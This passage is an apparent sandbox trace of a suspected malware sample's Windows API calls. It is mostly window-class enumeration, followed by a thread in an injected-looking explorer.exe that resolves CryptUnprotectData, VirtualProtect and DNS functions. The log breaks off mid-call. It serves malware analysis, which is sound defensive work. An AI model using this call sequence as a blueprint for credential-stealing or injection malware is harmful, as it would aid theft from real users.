GetClassNameA (in: hWnd=0x20080, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x200f2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="ATL:000007FEF55B52C0") returned 20 [0228.901] GetClassNameA (in: hWnd=0x2010a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0228.901] GetClassNameA (in: hWnd=0x2006a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0228.901] GetClassNameA (in: hWnd=0x2012c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x20134, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x2012e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x200f4, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x20128, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x20126, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x4015a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x30144, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Button") returned 6 [0228.901] GetClassNameA (in: hWnd=0x40140, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0228.901] GetClassNameA (in: hWnd=0x60096, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x400e8, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x400c2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x800de, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.901] GetClassNameA (in: hWnd=0x200e2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0228.901] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0228.901] GetClassNameA (in: hWnd=0x20028, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0228.901] GetClassNameA (in: hWnd=0x400ec, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0228.901] GetClassNameA (in: hWnd=0x4004a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0228.901] GetClassNameA (in: hWnd=0x2004c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0228.902] GetClassNameA (in: hWnd=0x2004e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0228.902] GetClassNameA (in: hWnd=0x300fa, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0228.902] GetClassNameA (in: hWnd=0x400a6, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0228.902] GetClassNameA (in: hWnd=0x20054, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="ATL:000007FEFBD041F0") returned 20 [0228.902] GetClassNameA (in: hWnd=0x20090, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0228.902] GetClassNameA (in: hWnd=0x20084, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.902] GetClassNameA (in: hWnd=0x20070, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.902] GetClassNameA (in: hWnd=0x20086, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.902] GetClassNameA (in: hWnd=0x400c6, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.902] GetClassNameA (in: hWnd=0x400ca, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0228.902] GetClassNameA (in: hWnd=0x400b4, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0228.902] GetClassNameA (in: hWnd=0x400aa, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.902] GetClassNameA (in: hWnd=0x400da, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.902] GetClassNameA (in: hWnd=0x500e4, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.902] GetClassNameA (in: hWnd=0x400b2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0228.902] GetClassNameA (in: hWnd=0x6008a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0228.902] GetClassNameA (in: hWnd=0x2010c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.902] GetClassNameA (in: hWnd=0x20114, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.902] GetClassNameA (in: hWnd=0x2012a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.902] GetClassNameA (in: hWnd=0x2014c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0228.902] GetClassNameA (in: hWnd=0x2008e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0228.902] GetClassNameA (in: hWnd=0x20156, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0228.902] GetClassNameA (in: hWnd=0x4013c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0228.903] GetClassNameA (in: hWnd=0x60098, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0228.903] GetClassNameA (in: hWnd=0x6009c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0228.903] GetClassNameA (in: hWnd=0x101ae, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="populationopenings") returned 18 [0228.903] GetClassNameA (in: hWnd=0x401ba, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0228.903] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Doctrine_alcohol_win") returned 20 [0228.903] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="sensorsDemocratcls") returned 18 [0228.903] GetClassNameA (in: hWnd=0x101a2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Const_advertisement_window") returned 26 [0228.903] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="BagsShakiratourismwnd") returned 21 [0228.903] GetClassNameA (in: hWnd=0x1019a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="dallasRwnd") returned 10 [0228.903] GetClassNameA (in: hWnd=0x10196, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="wooden") returned 6 [0228.903] GetClassNameA (in: hWnd=0x10192, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="SpiceDespitecls") returned 15 [0228.903] GetClassNameA (in: hWnd=0x1018e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="smithwin") returned 8 [0228.903] GetClassNameA (in: hWnd=0x1018a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="zoo_differ_cls") returned 14 [0228.903] GetClassNameA (in: hWnd=0x10186, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="ruby_") returned 5 [0228.903] GetClassNameA (in: hWnd=0x10182, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="birthbeanclass") returned 14 [0228.903] GetClassNameA (in: hWnd=0x1017e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="objectsvirusIsraeli") returned 19 [0228.903] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="seekerapp") returned 9 [0228.903] GetClassNameA (in: hWnd=0x10176, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="potentiallywin") returned 14 [0228.903] GetClassNameA (in: hWnd=0x10172, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Wheneverwnd") returned 11 [0228.903] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="knewDifferenceskarenwnd") returned 23 [0228.903] GetClassNameA (in: hWnd=0x1016a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Definitelycls") returned 13 [0228.903] GetClassNameA (in: hWnd=0x10166, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="receptor_paintings_cls") returned 22 [0228.904] GetClassNameA (in: hWnd=0x10162, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="beveragesTapesdodclass") returned 22 [0228.904] GetClassNameA (in: hWnd=0x60110, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="abortion_Serbia_effect_") returned 23 [0228.904] GetClassNameA (in: hWnd=0x1010e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0228.904] GetClassNameA (in: hWnd=0x20020, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="#43") returned 3 [0228.904] GetClassNameA (in: hWnd=0x10058, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0228.904] GetClassNameA (in: hWnd=0x30044, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0228.904] GetClassNameA (in: hWnd=0x20018, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0228.904] GetClassNameA (in: hWnd=0x30062, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0228.904] GetClassNameA (in: hWnd=0x600a0, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0228.904] GetClassNameA (in: hWnd=0x20108, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x20148, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0228.904] GetClassNameA (in: hWnd=0x4013e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x40112, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x2005c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x20066, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x501bc, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x101ac, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x101a8, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x101a4, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x101a0, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x1019c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.904] GetClassNameA (in: hWnd=0x10198, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x10194, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x10190, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x1018c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x10188, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x10184, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x10180, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x1017c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x10178, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x10174, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x10170, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x1016c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x10168, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x10164, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x10160, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x700a4, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x2002a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x20076, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0228.905] GetClassNameA (in: hWnd=0x6009a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] GetClassNameA (in: hWnd=0x2005e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="IME") returned 3 [0228.905] Sleep (dwMilliseconds=0x64) [0229.025] EnumWindows (lpEnumFunc=0x2b94058, lParam=0x2b80000) [0229.025] GetClassNameA (in: hWnd=0x20080, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.025] GetClassNameA (in: hWnd=0x200f2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="ATL:000007FEF55B52C0") returned 20 [0229.025] GetClassNameA (in: hWnd=0x2010a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0229.025] GetClassNameA (in: hWnd=0x2006a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0229.025] GetClassNameA (in: hWnd=0x2012c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.025] GetClassNameA (in: hWnd=0x20134, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.025] GetClassNameA (in: hWnd=0x2012e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.026] GetClassNameA (in: hWnd=0x200f4, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.026] GetClassNameA (in: hWnd=0x20128, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.026] GetClassNameA (in: hWnd=0x20126, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.026] GetClassNameA (in: hWnd=0x4015a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.026] GetClassNameA (in: hWnd=0x30144, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Button") returned 6 [0229.026] GetClassNameA (in: hWnd=0x40140, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0229.026] GetClassNameA (in: hWnd=0x60096, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.026] GetClassNameA (in: hWnd=0x400e8, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.026] GetClassNameA (in: hWnd=0x400c2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.026] GetClassNameA (in: hWnd=0x800de, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0229.026] GetClassNameA (in: hWnd=0x200e2, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0229.026] GetClassNameA (in: hWnd=0x2001e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0229.026] GetClassNameA (in: hWnd=0x20028, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="CiceroUIWndFrame") returned 16 [0229.026] GetClassNameA (in: hWnd=0x400ec, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0229.026] GetClassNameA (in: hWnd=0x4004a, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0229.026] GetClassNameA (in: hWnd=0x2004c, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0229.026] GetClassNameA (in: hWnd=0x2004e, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0229.026] GetClassNameA (in: hWnd=0x300fa, lpClassName=0x4ddf680, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0256.972] EnumWindows (lpEnumFunc=0x2b94058, lParam=0x2b80000) returned 1 [0256.981] Sleep (dwMilliseconds=0x64) [0257.088] EnumWindows (lpEnumFunc=0x2b94058, lParam=0x2b80000) Thread: id = 315 os_tid = 0x720 Process: id = "12" image_name = "explorer.exe" filename = "c:\\windows\\syswow64\\explorer.exe" page_root = "0x5c60e000" os_pid = "0x8b0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xbdc" cmd_line = "C:\\Windows\\SysWOW64\\explorer.exe" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 192 os_tid = 0x8c0 [0158.804] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="ADVAPI32.dll" | out: DestinationString="ADVAPI32.dll") [0158.804] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="ADVAPI32.dll", AllocateDestinationString=1 | out: DestinationString="ADVAPI32.dll") returned 0x0 [0158.804] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ADVAPI32.dll", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x74d40000) returned 0x0 [0158.806] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="RegCloseKey" | out: DestinationString="RegCloseKey") [0158.806] LdrGetProcedureAddress (in: BaseAddress=0x74d40000, Name="RegCloseKey", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x74d5469d) returned 0x0 [0158.806] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="CRYPT32.dll" | out: DestinationString="CRYPT32.dll") [0158.806] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="CRYPT32.dll", AllocateDestinationString=1 | out: DestinationString="CRYPT32.dll") returned 0x0 [0158.806] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="CRYPT32.dll", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x759b0000) returned 0x0 [0158.809] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="CryptUnprotectData" | out: DestinationString="CryptUnprotectData") [0158.809] LdrGetProcedureAddress (in: BaseAddress=0x759b0000, Name="CryptUnprotectData", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x759e5a7f) returned 0x0 [0158.809] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="DNSAPI.dll" | out: DestinationString="DNSAPI.dll") [0158.809] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="DNSAPI.dll", AllocateDestinationString=1 | out: DestinationString="DNSAPI.dll") returned 0x0 [0158.809] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="DNSAPI.dll", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x74850000) returned 0x0 [0159.003] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="DnsFree" | out: DestinationString="DnsFree") [0159.003] LdrGetProcedureAddress (in: BaseAddress=0x74850000, Name="DnsFree", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x7485436b) returned 0x0 [0159.004] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="KERNEL32.DLL" | out: DestinationString="KERNEL32.DLL") [0159.004] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="KERNEL32.DLL", AllocateDestinationString=1 | out: DestinationString="KERNEL32.DLL") returned 0x0 [0159.004] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.DLL", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x76c20000) returned 0x0 [0159.004] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="LoadLibraryA" | out: DestinationString="LoadLibraryA") [0159.004] LdrGetProcedureAddress (in: BaseAddress=0x76c20000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x76c349d7) returned 0x0 [0159.004] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="GetProcAddress" | out: DestinationString="GetProcAddress") [0159.004] LdrGetProcedureAddress (in: BaseAddress=0x76c20000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x76c31222) returned 0x0 [0159.004] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="VirtualProtect" | out: DestinationString="VirtualProtect") [0159.005] LdrGetProcedureAddress (in: BaseAddress=0x76c20000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x76c3435f) returned 0x0 [0159.005] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="ntdll.dll" | out: DestinationString="ntdll.dll") [0159.005] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="ntdll.dll", AllocateDestinationString=1 | out: DestinationString="ntdll.dll") returned 0x0 [0159.005] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ntdll.dll", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x77130000) returned 0x0 [0159.005] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="memcmp" | out: DestinationString="memcmp") [0159.005] LdrGetProcedureAddress (in: BaseAddress=0x77130000, Name="memcmp", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x77162265) returned 0x0 [0159.005] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="ole32.dll" | out: DestinationString="ole32.dll") [0159.005] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="ole32.dll", AllocateDestinationString=1 | out: DestinationString="ole32.dll") returned 0x0 [0159.005] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x755e0000) returned 0x0 [0159.005] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="CoInitialize" | out: DestinationString="CoInitialize") [0159.005] LdrGetProcedureAddress (in: BaseAddress=0x755e0000, Name="CoInitialize", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x755fb636) returned 0x0 [0159.005] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="OLEAUT32.dll" | out: DestinationString="OLEAUT32.dll") [0159.005] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="OLEAUT32.dll", AllocateDestinationString=1 | out: DestinationString="OLEAUT32.dll") returned 0x0 [0159.005] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="OLEAUT32.dll", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x75220000) returned 0x0 [0159.005] LdrGetProcedureAddress (in: BaseAddress=0x75220000, Name=0x0, Ordinal=0x2, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x75224642) returned 0x0 [0159.005] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="SHELL32.dll" | out: DestinationString="SHELL32.dll") [0159.005] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="SHELL32.dll", AllocateDestinationString=1 | out: DestinationString="SHELL32.dll") returned 0x0 [0159.005] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHELL32.dll", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x75fd0000) returned 0x0 [0159.006] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="SHGetFolderPathW" | out: DestinationString="SHGetFolderPathW") [0159.006] LdrGetProcedureAddress (in: BaseAddress=0x75fd0000, Name="SHGetFolderPathW", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x76055708) returned 0x0 [0159.006] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="SHLWAPI.dll" | out: DestinationString="SHLWAPI.dll") [0159.006] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="SHLWAPI.dll", AllocateDestinationString=1 | out: DestinationString="SHLWAPI.dll") returned 0x0 [0159.006] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="SHLWAPI.dll", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x75340000) returned 0x0 [0159.006] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="StrStrIW" | out: DestinationString="StrStrIW") [0159.006] LdrGetProcedureAddress (in: BaseAddress=0x75340000, Name="StrStrIW", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x753546e9) returned 0x0 [0159.006] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="USER32.dll" | out: DestinationString="USER32.dll") [0159.006] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="USER32.dll", AllocateDestinationString=1 | out: DestinationString="USER32.dll") returned 0x0 [0159.006] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USER32.dll", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x74f40000) returned 0x0 [0159.006] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="wsprintfA" | out: DestinationString="wsprintfA") [0159.006] LdrGetProcedureAddress (in: 